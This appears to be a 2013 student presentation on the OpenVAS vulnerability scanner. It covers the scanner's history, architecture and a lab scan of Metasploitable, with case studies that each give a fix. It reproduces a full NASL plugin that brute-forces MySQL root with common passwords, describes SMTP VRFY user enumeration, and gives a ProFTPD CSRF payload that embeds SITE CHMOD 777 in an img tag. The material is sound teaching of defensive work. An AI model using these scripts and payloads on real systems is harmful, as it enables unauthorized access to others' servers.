Using
OpenVAS
PaulNechifor
ValentinSchipor
Home • Projects • Git source
6 December 2013
Agenda
- History
- OpenVAS Architecture
- OpenVAS Usage
- Case Studies
- MySQL weak password
- VRFY & EXPN in Postfix
- PHP-CGI vulnerability
- ProFTPD Cross-site Request Forgery
- Comparisons
Vulnerability Scanners
- Tools for finding weaknesses in programs, systems, and networks.
- Scan types:
- Ports
- Web applications
- Database security
- Computer networks, etc.
COPS
- Short for Computer Oracle and Password System.
- A suite of 12 tools for security auditing
Unix systems created in 1989 by Dan Farmer. - The first to achieve widespread use.
- Scanns for:
- poor passwords;
- writability of users home directories and startup files;
- anonymous ftp setup;
- tampering of important binaries;
- and others.
SATAN
- Short for Security Administrator Tool for Analyzing Networks.
- Created by Dan Farmer and Wieste Venema and released in 1995.
- Controversy and hysteria:
[F]iguring out how to break into a multitude of Internet sites is literally as easy pulling up a dialog box in the program, and filling in two fields. — PC Magazine
SATAN is like a gun, and this is like handing a gun to a 12-year-old. — LA Times
OpenVAS
- Short for Open Vulnerability Assessment System.
- A framework of services and tools for finding and managing vulnerabilities.
- Runs on Linux, but scans multiple platforms.
- Open source. Forked from Nessus in 2005 after it became closed.
OpenVAS Architecture
OpenVAS Scanner
- The core technology which connects to the targets and executes the tests called Network Vulnerability Tests or NVTs.
- Available as a HTTPS service on port 9391.
OpenVAS Manager
- Acts as an intermediary between the scanner and clients.
- Implements most of the logic of scanning and reading the configs so that consistent clients can be easily implemented on top.
- OpenVAS Transfer Protocol: Manager to Scanner communication.
- OpenVAS Management Protocol: Client to Manager communication.
OpenVAS Administrator
- Manages users and NVT feeds.
- Feeds:
- OpenVAS NVT Feed: free, updated daily, >30.000 NVTs.
- Greenbone Security Feed: commercial.
Greenbone Security Desktop
- Qt-based client which runs on Linux. (Previously: Windows, too.)
OpenVAS CLI
- The command line interface client.
- Used best for batch processes and scripts.
Greenbone Security Assistant
Greenbone Security Assistant
- Web server normally bound to 127.1 (loopback, so no external access).
- Can be made accessible to other locations.
- Runs on any platform with a browser.
- GSA works the the Manager and also with the Administrator.
NASL
- Stands for Nessus Attack Scripting Language.
- C-like language left over from Nessus and is optimized for writing NVT (as opposed to a general scripting language).
- Includes simple library functions for sockets, networks, HTTP, FTP, crypto, and others.
- Source code usually found in
/var/lib/openvas/plugins.
OpenVAS Usage
Kali Linux
- What we used for hosting OpenVAS.
- Kali Linux is a Debian-based distribution created for penetration testing.
- Comes preinstalled with numerous tools: OpenVAS, Metasploit, Wireshark, nmap, John the Ripper, etc.
Metasploitable
- What we will be scanning.
- An intentionally vulnerable Linux virtual machine.
- (Like the discontinued Damn Vulnerable Linux.)
- Misconfigured, old, and with known vulnerabilities: databases, web services, FTP, SHH, and many others.
Preparing OpenVAS
Downloading the latest NVTs:
# openvas-nvt-syncor from the GSA
Currently there are ~33000 NVTs.
Creating a Task
Choosing the deepest scan config and the Metasploitable VM as the target (with address 192.168.1.102).
Viewing Tasks
Viewing all the tasks. The previous one was started.
Task Details
Showing the status and the intermediary report.
Task Done
- Deepest task was completed after ~1 hour on my VM.
- Scan results for two configurations, same target:
Config High Medium Low Log Full and fast 41 21 15 75 Full and very deep ultimate 45 25 16 76 - Reports are downloadable in multiple formats: HTML, LaTeX, PDF, TXT, XML, and other.
Overview of threat level per port.
Detailed summaries with solutions and references.
Solutions usually suggest upgrading the application, but not always.
Case studies
1. MySQL weak password
Trying login from Kali Linux: Works
(Note: IP is different because I had to restart the VM.)
The NVT
Hunting down the NVT:
grep -r 'empty password' /var/lib/openvas/plugins | grep mysqlFull source code:
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_mysql_weak_passwords.nasl 12 2013-10-27 11:15:33Z jan $
#
# MySQL weak password
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_summary = "It was possible to login into the remote MySQL as root using weak credentials.";
tag_solution = "Change the password as soon as possible.";
SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.103551";
CPE = "cpe:/a:mysql:mysql";
# need desc here to modify it later in script.
desc = "
Summary:
" + tag_summary + "
Solution:
" + tag_solution;
if (description)
{
script_tag(name:"cvss_base", value:"9.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:P/A:P");
script_tag(name:"risk_factor", value:"Critical");
script_oid(SCRIPT_OID);
script_version("$Revision: 12 $");
script_tag(name:"last_modification", value:"$Date: 2013-10-27 12:15:33 +0100 (Sun, 27 Oct 2013) $");
script_tag(name:"creation_date", value:"2012-08-23 10:38:09 +0200 (Thu, 23 Aug 2012)");
script_name("MySQL weak password");
script_description(desc);
script_summary("Checks if login with default credentials is possible");
script_category(ACT_ATTACK);
script_family("Default Accounts");
script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
script_dependencies("mysql_version.nasl");
script_require_ports("Services/mysql", 3306);
script_require_keys("MySQL/installed");
if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
}
exit(0);
}
include("byte_func.inc");
include("host_details.inc");
set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);
port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
if(!port) {
port = 3306;
}
if(!get_port_state(port))exit(0);
if(get_kb_item("MySQL/blocked"))exit(0);
username = "root";
passwords = make_list("admin","root","mysql","password","passw0rd","123456","12345678","mysqladmin","qwerty","letmein","database","");
foreach password (passwords) {
ver = "";
pass = "";
req = "";
native = FALSE;
sock = open_sock_tcp(port);
if(!sock)exit(0);
res = recv(socket:sock, length:4);
if(!res) {
close(sock);
exit(0);
}
plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);
res = recv(socket:sock, length:plen);
if("mysql_native_password" >< res)native = TRUE;
for (i=0; i<strlen(res); i++) {
if (ord(res[i]) != 0) {
ver += res[i];
}
else {
break;
}
}
p = strlen(ver);
if(p < 5) {
close(sock);
exit(0);
}
caps = substr(res, 14+p, 15+p);
if(!caps)continue;
caps = ord(caps[0]) | ord(caps[1]) << 8;
proto_is_41 = (caps & 512);
if(!proto_is_41) {
close(sock);
exit(0);
}
salt = substr(res, 5+p, 12+p);
if(strlen(res) > (44+p)) {
salt += substr(res, 32+p, 43+p);
}
sha_pass1 = SHA1(password);
sha_pass2 = SHA1(sha_pass1);
sha_pass3 = SHA1(salt + sha_pass2);
l = strlen(sha_pass3);
for (i=0; i<l; i++) {
pass += raw_string(ord(sha_pass1[i]) ^ ord(sha_pass3[i]));
}
req = raw_string(0x05,0xa6,0x0f,0x00,0x00,0x00,0x00,0x01,0x21,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00);
req += raw_string(username,0x00);
if(strlen(password) >0) {
req += raw_string(0x14,pass);
} else {
req += raw_string(0x00);
}
if(native) req += raw_string(0x6d,0x79,0x73,0x71,0x6c,0x5f,0x6e,0x61,0x74,0x69,0x76,0x65,0x5f,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x00);
len = strlen(req);
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x01) + req;
send(socket:sock,data:req);
res = recv(socket:sock, length:4);
if(!res || strlen(res) < 4) {
close(sock);
continue;
}
plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);
res = recv(socket:sock, length:plen);
if(!res || strlen(res) < plen) {
close(sock);
continue;
}
errno = ord(res[2]) << 8 | ord(res[1]);
if(errno > 0 || errno == "") {
close(sock);
continue;
}
cmd = 'show databases';
len = strlen(cmd) + 1;
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x00, 0x03, cmd);
send(socket:sock,data:req);
z = 0;
while(1) {
z++;
if(z > 15)exit(0);
res = recv(socket:sock, length:4);
if(!res || strlen(res) < 4) {
close(sock);
exit(0);
}
plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);
res = recv(socket:sock, length:plen);
if(!res || strlen(res) < plen)break;
if("information_schema" >< res) {
close(sock);
data = desc + 'nnIt was possible to login as root';
if(strlen(password) > 0) {
data += ' with password "' + password + '".';
} else {
data += ' with an empty password.';
}
data += 'nn';
security_hole(port:port,data:data);
exit(0);
}
}
close(sock);
}
close(sock);- Tries to see if the specified or standard port is open.
- Loops through a small list of common passwords and opens a connection on each one.
port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
if(!port) { port = 3306; }
if(!get_port_state(port)) exit(0);
if(get_kb_item("MySQL/blocked")) exit(0);
username = "root";
passwords = make_list("admin","root","mysql","password","passw0rd","123456","12345678","mysqladmin","qwerty","letmein","database","");
foreach password (passwords) {
...
sock = open_sock_tcp(port);
if(!sock)exit(0);
res = recv(socket:sock, length:4);
...
}
- Runs the whole authentication protocol.
- Tries to run a command to confirm.
sha_pass1 = SHA1(password);
sha_pass2 = SHA1(sha_pass1);
sha_pass3 = SHA1(salt + sha_pass2);
...
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x01) + req;
send(socket:sock,data:req);
res = recv(socket:sock, length:4);
...
cmd = 'show databases';
len = strlen(cmd) + 1;
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x00, 0x03, cmd);
send(socket:sock,data:req);
Solution
Changing the MySQL password in Metasploitable, as per recommendation:
$ mysql -u root -p password [a-better-one-goes-here]
Enter password:
$ Trying the same thing again fails:
2. VRFY & EXPN in Postfix
What server is it?
Let's check the vulnerability
- Log in using
telnet. - Use EHLO (enhanced hello) to see what's supported.
- There's VRFY! Sending
VRFY rootreturns 252 (not confirming existence, which is 250, but will attempt).
What about non-existant users?
Kali Linux: checking paul.nechifor.
Metasploitable: adding user paul.nechifor in the meantime.
Sidetrack: Send an email to root using telnet
Sidetrack: The email was received.
Solution
Edit /etc/postfix/conf.cf to add disable_vrfy_command=yes and then:
# /etc/init.d/postfix restart
3. PHP-CGI vulnerability
How to view source in PHP.
How the page normally looks.
Using the -s vulnerability:
Solution
Upgrade Apache to the newest version.
4. ProFTPD Cross-site Request Forgery
The problem in the source code is the use of a while loop and of fgets(). What happens is that long commands like:
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
will be split in
500 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command not understood. 500'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
So requesting this from a browser:
ftp://[email protected]//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////systWill also result in SYST being executed.
From here the bug can be exploited like any other CSRF attack. Example: inserting a crafted img tag and tricking an admin to execute it.
Example:
ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILEwill change permission to EXAMPLEFILE when the owner will use this URL.
So this needs to be inserted into a page that the admin will visit: <img src="ftp://.../SITE%20CHMOD%20777%20EXAMPLEFILE">
Solution
Using a byte to inform about overflow.
The vulnerable parts of ProFTPD have been patched and are available in the newest versions.
Comparisons
OpenVAS vs Nessus
- A comparisson done by LS&S in 2009 with 15 servers and multiple vulnerabilities.
Tool Percentage Nessus 84 % OpenVAS 24 % - The tests show a clear superiority of Nessus with the overall results.
OpenVAS vs Nessus
- The same test, only counting vulnerabilities discovered in the last two years:
Tool Percentage Nessus 36 % OpenVAS 72 % - The test concludes:
Even though Nessus [...] has larger base of plugins and discovers more known vulnerabilities, results [...] showed that OpenVAS scanner discover more recent vulnerabilities. These are pretty good results for OpenVAS considering Nessus have three times more plugins and 10+ years of development behind.
- Given that OpenVAS is free and Nessus costs $1500 per year, OpenVAS is a good alternative for security auditing.
Sources
- ftp://coast.cs.purdue.edu/pub/tools/unix/scanners/cops/
- www.csee.umbc.edu/~woodcock/cmsc482/proj1/satan.html
- en.wikipedia.org/wiki/OpenVAS
- www.openvas.org/about.html
- www.openvas.org/software.html
- www.openvas.org/compendium/openvas-compendium.html
- security.lss.hr/images/stories/documents/Nessus_vs_OpenVAS_en.pdf
- bugs.proftpd.org/show_bug.cgi?id=3115